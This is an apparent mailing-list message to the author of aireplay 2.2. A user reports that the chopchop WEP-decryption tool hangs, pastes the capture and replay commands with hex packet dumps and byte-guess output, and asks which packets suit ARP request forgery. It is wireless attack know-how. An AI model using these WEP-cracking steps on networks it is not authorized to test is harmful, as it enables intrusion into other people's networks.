im having a little problem with the arp request forgery technique in your
readme, i know it's not directly related to aireplay 2.2 but i thought my
problem might be of help for future verison features/ideas and if not im
sorry and i understand
here is my output sorry but it's a but long.
packets came from going to a web site on a client machine.
D-Link=00:0D:88:8D:18:2F
WinXP=00:04:E2
8:7B:AF
root@tekn0:~/root/aireplay-2.2# ./aireplay -i wlan0 -b 00:0D:88:8D:18:2F
Seen 23 packets, none usable...
Found one usable WEP data packet:
From DS = 1, To DS = 0
BSSID = 00:0D:88:8D:18:2F
Src. MAC = 00:04:E2
8:7B:AF
Dst. MAC = FF:FF:FF:FF:FF:FF
0x0000: 0842 0000 ffff ffff ffff 000d 888d 182f .B............./
0x0010: 0004 e2d8 7baf c039 720b 0000 4748 2efd ....{..9r...GH..
0x0020: 764c 584c 7458 74fd 2415 8431 19be 090c vLXLtXt.$..1....
0x0030: 13ef 6747 deeb 94f1 39d8 0264 0b63 492e ..gG....9..d.cI.
0x0040: fc5d 4cc4 .]L.
Replay this packet ? n
Seen 24 packets, none usable...
Found one usable WEP data packet:
From DS = 1, To DS = 0
BSSID = 00:0D:88:8D:18:2F
Src. MAC = 00:04:E2
8:7B:AF
Dst. MAC = FF:FF:FF:FF:FF:FF
0x0000: 0842 0000 ffff ffff ffff 000d 888d 182f .B............./
0x0010: 0004 e2d8 7baf d039 730b 0000 f139 86f9 ....{..9s....9..
0x0020: 8ea9 2e1b 7858 88a6 325d d0c0 afd6 72cc ....xX..2]....r.
0x0030: f21e a8ca 20ea 8f07 b883 bcbd d47a ec1f .... ........z..
0x0040: 424f af5d BO.]
Replay this packet ? n
Seen 25 packets, none usable...
Found one usable WEP data packet:
From DS = 1, To DS = 0
BSSID = 00:0D:88:8D:18:2F
Src. MAC = 00:0D:88:8D:18:2F
Dst. MAC = 00:04:E2
8:7B:AF
0x0000: 0842 7500 0004 e2d8 7baf 000d 888d 182f .Bu.....{....../
0x0010: 000d 888d 182f e039 912b 0000 a319 731f ...../.9.+....s.
0x0020: bf78 0abc 34cf 559e a2ac 1b39 0175 211f .x..4.U....9.u!.
0x0030: ce35 2f44 1d77 db46 71eb 3bb7 093b 5502 .5/D.w.Fq.;..;U.
0x0040: a63d cc5e 6080 91c0 .=.^`...
Replay this packet ? y
Saving replayed packet in replay-20050201_2144.cap
root@tekn0:~/root/aireplay-2.2# ./chopchop-0.1/chopchop -b 00:0D:88:8D:18:2F -m 00:04:E2
8:7B:AF -p replay-20050201_2144.cap
00:0D:88:8D:18:2F 6
0
00:04:E2
8:7B:AF 6
first pass
-----------------
packet number 001
base src mac: 00 04 e2 d8 7b af
base dst mac: ff 0a 2d 13 49 38
guess 0x7a / number of frame written 130
guess 0x67 / number of frame written 104
guess 0xcb / number of frame written 208
guess 0xbe / number of frame written 195
guess 0x6e / number of frame written 117
guess 0x00 / number of frame written 9
guess 0xa8 / number of frame written 169
guess 0xc0 / number of frame written 195
guess 0x6e / number of frame written 117
guess 0x00 / number of frame written 5
guess 0xa8 / number of frame written 169
guess 0xc0 / number of frame written 195
guess 0xaf / number of frame written 182
guess 0x7b / number of frame written 130
guess 0xd8 / number of frame written 221
guess 0xe2 / number of frame written 234
guess 0x04 / number of frame written 13
guess 0x00 / number of frame written 8
guess 0x01 / number of frame written 7
guess 0x00 / number of frame written 4
guess 0xa8 / number of frame written 169
guess 0xc0 / number of frame written 195
guess 0x2f / number of frame written 52
guess 0x18 / number of frame written 39
guess 0x8d / number of frame written 143
guess 0x88 / number of frame written 143
guess 0x0d / number of frame written 273
guess 0x00 / number of frame written 12
guess 0x02 / number of frame written 13
guess 0x00 / number of frame written 13
guess 0x04 / number of frame written 13
guess 0x06 / number of frame written 13
then it just hangs and does nothing
am i not waiting long enough?, waited 5 minutes.
i have tried a few diffrent packets although im not sure what types they
were nore the sizes but they all hang in the same manner, they spit out a
bunch of "frame written 13" at the end
i fallowed the instructions in the readme although im not sure exactly
what packet to pick i tired to use ones that had source and dest fields
filled in and not use any packets with ff:ff:ff:ff:ff:ff for the dst mac.
also does aireplay 2.2 have any way to display the packet
size when it's asking you if you want to use the packet and would you know
of the best packets to use, i know arps/tcp ack/and dhcp are supposet to
work well but im not sure the best way to tell the size of the packet.
thanks again for such a great tool and all your time and help.